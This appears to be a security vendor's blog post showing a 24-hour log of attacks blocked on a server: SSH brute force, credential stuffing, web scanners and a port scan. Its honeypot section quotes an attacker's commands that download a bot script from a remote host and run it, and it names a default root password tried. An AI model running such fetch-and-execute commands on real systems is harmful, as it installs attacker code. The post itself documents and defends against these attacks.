Skip to content
All posts
Real-World Security

What Happens When Your Server Gets Attacked: A Real 24-Hour Log

9 min read

Every server with a public IP is under attack. Not occasionally. Constantly. If you have never watched the logs in real time, you might not realize the scale. This is a real 24-hour log from a production VPS running Inner Warden. Every incident was detected and handled automatically. The operator slept through most of it.

All IP addresses shown are from the RFC 5737 documentation range. The attack patterns and timelines are real.

Morning (06:00 - 12:00): SSH brute-force wave

The day started early. Between 06:00 and noon, Inner Warden detected and blocked 15 distinct SSH brute-force attacks from IPs across 8 countries. Most were automated botnets cycling through credential lists.

06:12ssh203.0.113.14 | 24 failed logins in 31s | blocked | AbuseIPDB: 100%
07:45ssh198.51.100.8 | 11 failed logins in 18s | blocked | GeoIP: CN
08:33ssh192.0.2.91 | 8 failed logins in 52s | blocked | AbuseIPDB: 97%
09:17stuff203.0.113.77 | 31 distinct usernames in 89s | credential stuffing | blocked
10:02ssh198.51.100.22 | 19 failed logins in 27s | blocked | GeoIP: RU
11:48ssh192.0.2.15 | 14 failed logins in 41s | blocked | AbuseIPDB: 89%

Fifteen brute-force incidents in 6 hours. Each blocked in under 5 seconds. Each reported to AbuseIPDB. The operator saw the Telegram alerts accumulate and took no action because none was needed.

Afternoon (12:00 - 18:00): web scanner probes

After lunch, the attacks shifted to the web layer. Three different scanners probed the Nginx server looking for vulnerabilities.

13:22scan203.0.113.156 | Nuclei scan | 1,847 requests | 1,612 errors | blocked
14:55scan198.51.100.44 | sqlmap detected via User-Agent | blocked immediately
16:33scan192.0.2.200 | directory bruteforce | 934 404 errors in 3 minutes | blocked
17:11port203.0.113.89 | port scan | 67 unique ports in 12s | blocked

The Nuclei scan is typical: thousands of requests testing for known CVEs, default credentials, and misconfigurations. Inner Warden detected it via both User-Agent matching and HTTP error flood analysis.

Evening (18:00 - 00:00): credential stuffing botnet

In the evening, a coordinated credential stuffing campaign hit the server. Multiple IPs from the same ASN tried different username lists. Inner Warden's correlation engine linked them together.

19:04stuff203.0.113.31 | 18 distinct usernames | credential stuffing | blocked
19:07stuff203.0.113.32 | 22 distinct usernames | same ASN as .31 | blocked
19:11stuff203.0.113.33 | 15 distinct usernames | same ASN | blocked
19:14corrCorrelation: 3 IPs from same ASN | coordinated credential stuffing campaign

Night (00:00 - 06:00): honeypot capture

The most interesting event of the day happened at 2 AM. An attacker connected to the SSH honeypot on port 2222 and spent 4 minutes in the fake shell.

02:14honey198.51.100.67 connected to honeypot | tried root:toor
02:14cmduname -a
02:15cmdwget http://203.0.113.99/bot.sh -O /tmp/bot.sh
02:16cmdchmod +x /tmp/bot.sh && /tmp/bot.sh
02:18blockSession ended | IP blocked | full transcript logged

The attacker tried to download and run a botnet agent. The honeypot pretended everything worked. The attacker left thinking they had a new bot. They do not. The transcript reveals their infrastructure URL and post-compromise playbook, intelligence that helps protect against future attacks.

24-hour summary

SSH brute-force incidents15
Credential stuffing incidents4
Web scanner probes3
Port scans1
Honeypot sessions1
Total IPs blocked24
AbuseIPDB reports filed24
Manual intervention required0

This is a typical day. Not an exceptional one. Every public-facing server sees this volume. The question is whether something is watching and responding, or whether the attacks run unopposed until someone checks the logs.

What to do next